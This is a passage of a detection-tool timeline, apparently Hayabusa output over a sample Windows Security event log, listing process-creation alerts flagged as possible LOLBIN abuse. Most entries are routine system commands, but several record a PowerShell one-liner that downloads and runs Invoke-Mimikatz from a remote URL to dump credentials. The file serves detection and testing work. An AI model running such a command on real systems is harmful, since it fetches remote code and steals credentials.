0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:34:51.099 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:36:35.595 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:38:39.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:38:44.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:38:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfa8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:54:34.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:54:34.019 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x77c | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:54:34.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xbd4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 05:56:33.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xcd0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 09:49:33.186 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-27 09:49:33.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:20:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe 
aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x550 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:20:56.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:20:57.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x428 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:20:57.955 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:21:00.750 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:21:00.752 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x734 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:21:00.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:22:11.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:22:11.319 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:31:37.371 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:31:37.402 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb20 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x500 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 01:46:13.438 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb74 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 01:46:13.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x648 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:44:54.269 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xcf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:44:55.299 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:44:55.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:45:05.616 +09:00,IE10Win7,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 11:00:00.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 13:15:14.072 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 13:15:14.084 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:30.766 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART | Path: C:\Windows\System32\rundll32.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:30.851 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x778 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:30.855 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xb18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:31.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:31.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:37:31.960 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: 
C:\Windows\System32\ipconfig.exe | PID: 0x6bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:54:31.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xebc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:54:31.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:54:31.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:12:55.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:56.352 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pokby4eb.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zfglcxyz.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdd4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:56.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\agq-0l0x.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:56.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\h5llmxxc.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xb80 | User: 
IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:57.533 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xb18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:19:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x1a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:26:10.013 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:26:10.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 03:52:07.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware 
Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x704 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 03:52:09.246 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 03:55:06.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience 